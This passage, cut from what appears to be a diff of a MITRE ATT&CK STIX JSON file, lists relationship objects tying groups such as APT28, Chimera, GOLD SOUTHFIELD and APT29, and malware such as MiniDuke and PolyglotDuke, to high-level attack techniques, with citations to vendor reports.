"Zdnet Ngrok September 2018", + "url": "https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/", + "description": "Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020." + } + ], + "description": "[Ngrok](https://attack.mitre.org/software/S0508) can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.(Citation: Zdnet Ngrok September 2018)", + "relationship_type": "uses", + "id": "relationship--87ca16c5-1d11-4dca-b127-b23365e4f66f", + "type": "relationship", + "modified": "2020-09-15T14:56:31.197Z", + "created": "2020-09-15T14:56:31.197Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31", + "target_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "relationship_type": "mitigates", + "description": "Turn off or restrict access to unneeded VB components.(Citation: Microsoft Disable VBA Jan 2020)", + "id": "relationship--9f001062-668f-45c9-a747-f224c8e5712a", + "external_references": [ + { + "source_name": "Microsoft Disable VBA Jan 2020", + "url": "https://docs.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/turn-off-visual-basic-for-application", + "description": "Microsoft. (2020, January 23). How to turn off Visual Basic for Applications when you deploy Office. Retrieved September 17, 2020." + } + ], + "type": "relationship", + "modified": "2020-09-23T11:31:50.575Z", + "created": "2020-09-17T12:51:40.971Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "relationship_type": "subtechnique-of", + "id": "relationship--ddff2aa4-975a-4a89-9c1d-b0a4b3a07b63", + "type": "relationship", + "modified": "2020-09-17T12:51:40.982Z", + "created": "2020-09-17T12:51:40.982Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "external_references": [ + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020." + } + ], + "description": "[APT28](https://attack.mitre.org/groups/G0007) has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days.(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020) ", + "relationship_type": "uses", + "id": "relationship--4b8bdc58-cfb9-4841-94e9-421b9e08f44f", + "type": "relationship", + "modified": "2020-09-18T21:44:21.368Z", + "created": "2020-09-18T21:44:21.368Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used scheduled tasks to invoke Cobalt Strike and maintain persistence.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--1ddc8822-55de-4671-8a73-c95d6383016f", + "type": "relationship", + "modified": "2020-09-22T19:21:20.247Z", + "created": "2020-09-22T19:21:20.247Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used legitimate credentials to login to an external VPN.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--bd8a36f5-1da5-49de-b292-ac0e4a58340c", + "type": "relationship", + "modified": "2020-09-22T19:21:20.276Z", + "created": "2020-09-22T19:21:20.276Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used direct Windows system calls by leveraging Dumpert.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--3cf6afbd-a010-4982-8121-22e67ace6046", + "type": "relationship", + "modified": "2020-09-29T18:43:01.572Z", + "created": "2020-09-22T19:30:17.612Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--fdeec368-dd76-4b25-8800-b2019ad4d008", + "type": "relationship", + "modified": "2020-09-22T19:30:17.672Z", + "created": "2020-09-22T19:30:17.672Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--be49ddce-5925-4fb2-8822-0b665d9aa812", + "type": "relationship", + "modified": "2020-09-22T19:30:17.684Z", + "created": "2020-09-22T19:30:17.684Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + } + ], + "description": "(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--bff99f91-e1a9-4379-a2d9-5a99615a95d1", + "type": "relationship", + "modified": "2020-09-22T19:41:27.951Z", + "created": "2020-09-22T19:41:27.951Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.(Citation: Secureworks REvil September 2019)\t", + "relationship_type": "uses", + "id": "relationship--bc7f00a2-ba1c-428a-ba8f-174703389c73", + "type": "relationship", + "modified": "2020-10-06T15:23:45.908Z", + "created": "2020-09-22T20:17:38.750Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has breached Managed Service Providers (MSP's) to deliver malware to MSP customers.(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--1567be6a-0231-4605-b92b-ae1bc5e1bb4e", + "type": "relationship", + "modified": "2020-09-22T20:17:38.769Z", + "created": "2020-09-22T20:17:38.769Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has exploited Oracle WebLogic vulnerabilities for initial compromise.(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--42d0b653-1d08-4e7b-910f-753412fda316", + "type": "relationship", + "modified": "2020-09-22T20:17:38.795Z", + "created": "2020-09-22T20:17:38.795Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has conducted malicious spam (malspam) campaigns to gain access to victim's machines.(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--f7aab529-962c-4bb8-812b-d63e0f8df494", + "type": "relationship", + "modified": "2020-09-22T20:17:38.785Z", + "created": "2020-09-22T20:17:38.785Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GOLD SOUTHFIELD", + "url": "https://www.secureworks.com/research/threat-profiles/gold-southfield", + "description": "Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020." + } + ], + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)", + "relationship_type": "uses", + "id": "relationship--689b0bff-7eb4-4678-997b-64794c56add0", + "type": "relationship", + "modified": "2020-10-06T15:32:20.360Z", + "created": "2020-09-22T20:17:38.809Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + } + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)", + "relationship_type": "uses", + "id": "relationship--5163aacb-0983-4c96-865e-e6164671c920", + "type": "relationship", + "modified": "2020-10-09T16:07:59.221Z", + "created": "2020-09-23T13:28:47.271Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) has used steganography to hide C2 communications in images.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--89ed0007-151d-407f-bf6b-2eba0ad69207", + "type": "relationship", + "modified": "2020-10-09T16:07:59.223Z", + "created": "2020-09-23T13:28:47.320Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) has used social media platforms to hide communications to C2 servers.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--91b07c1e-9344-422a-b233-1546f3f81c04", + "type": "relationship", + "modified": "2020-10-09T16:07:59.257Z", + "created": "2020-09-23T13:28:47.323Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) has developed malware variants written in Python.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--b5373794-5133-41b2-9050-228ebac75c92", + "type": "relationship", + "modified": "2020-10-09T16:07:59.285Z", + "created": "2020-09-23T13:28:47.328Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b136d088-a829-432c-ac26-5529c26d4c7e", + "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[OnionDuke](https://attack.mitre.org/software/S0052) has the capability to use a Denial of Service module.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--5e5b108b-fec6-4d44-ad9a-9302d4f6e368", + "type": "relationship", + "modified": "2020-10-09T16:07:59.302Z", + "created": "2020-09-23T14:54:15.479Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--b136d088-a829-432c-ac26-5529c26d4c7e", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[OnionDuke](https://attack.mitre.org/software/S0052) can use a custom decryption algorithm to decrypt strings.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--e1fba82d-1cd2-4906-92db-ba3aafad72ca", + "type": "relationship", + "modified": "2020-10-09T16:07:59.318Z", + "created": "2020-09-23T14:58:01.540Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can enumerate local drives.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--6ed5bd9a-3f94-4ed0-94fb-0d3b93bc984e", + "type": "relationship", + "modified": "2020-10-09T16:07:59.339Z", + "created": "2020-09-23T15:18:36.542Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can gather the hostname on a compromised machine.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--30e6bb1e-7c6a-4fff-8163-f5a065d2d960", + "type": "relationship", + "modified": "2020-10-09T16:07:59.384Z", + "created": "2020-09-23T15:18:36.544Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can create a process on a compromised host.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--db1e0f94-acdb-4a5a-8ad6-b469f305e44a", + "type": "relationship", + "modified": "2020-10-09T16:07:59.407Z", + "created": "2020-09-23T15:18:36.547Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "target_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--6e1e9f11-ab28-48cc-b392-f2863707fe11", + "type": "relationship", + "modified": "2020-10-09T16:07:59.423Z", + "created": "2020-09-23T15:18:36.579Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can use control flow flattening to obscure code.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--569815f7-4a3f-47f3-8903-0b0b2d409c3c", + "type": "relationship", + "modified": "2020-10-09T16:07:59.438Z", + "created": "2020-09-23T15:18:36.581Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "target_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can use DGA to generate new Twitter URLs for C2.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--430e71be-1fd2-4ff6-977d-bc4c8a7222e5", + "type": "relationship", + "modified": "2020-10-09T16:07:59.473Z", + "created": "2020-09-23T15:18:36.583Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--6aaca244-805c-4aba-b923-40407b034662", + "type": "relationship", + "modified": "2020-10-09T16:07:59.523Z", + "created": "2020-09-23T15:48:24.645Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can use steganography to hide C2 information in images.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--e9342a76-171e-4831-96b7-d998a6de8282", + "type": "relationship", + "modified": "2020-10-09T16:07:59.540Z", + "created": "2020-09-23T16:08:44.294Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can use Twitter, Reddit, Imgur and other websites to get a C2 URL.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--9fd03410-47ca-4ddc-9202-8f4a7558b263", + "type": "relationship", + "modified": "2020-10-09T16:07:59.570Z", + "created": "2020-09-23T16:08:44.318Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + 